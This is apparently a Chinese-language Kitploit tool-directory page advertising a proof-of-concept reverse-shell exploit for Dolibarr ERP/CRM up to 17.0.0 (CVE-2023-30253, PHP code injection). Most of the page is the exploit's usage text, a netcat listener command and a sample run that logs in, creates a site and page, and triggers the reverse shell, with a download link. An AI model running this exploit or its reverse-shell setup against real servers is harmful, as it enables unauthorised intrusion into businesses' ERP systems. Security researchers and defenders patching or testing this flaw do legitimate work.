Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC-exploit-for-Dolibarr — 针对 Dolibarr <= 17.0.0 (CVE-2023-30253) 的 POC 漏洞利用 | Kitploit
工具/GitHubGitHub/1lkla/poc-exploit-for-dolibarr
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试
GitHub1lkla/poc-exploit-for-dolibarr

POC-exploit-for-Dolibarr

针对 Dolibarr <= 17.0.0 (CVE-2023-30253) 的 POC 漏洞利用

查看仓库
18个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

针对 Dolibarr <= 17.0.0 (CVE-2023-30253) 的 POC 利用程序

反向 Shell POC 利用程序,针对 Dolibarr <= 17.0.0 (CVE-2023-30253),PHP 代码注入

查看更多漏洞详情 这里

PoC

利用程序帮助:

root@kitploit:~
➜  python3 exploit.py -h
usage: python3 exploit.py <TARGET_HOSTNAME> <USERNAME> <PASSWORD> <LHOST> <LPORT>
example: python3 exploit.py http://example.com login password 127.0.0.1 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

options:
  -h, --help  show this help message and exit

在你的主机上运行 netcat:

root@kitploit:~
➜ nc -lvnp 9001

运行利用程序(示例):

root@kitploit:~
➜ python3 exploit.py http://example.com login passsword 127.0.0.1 9001
[*] Trying authentication...
[**] Login: login
[**] Password: password
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
下载工具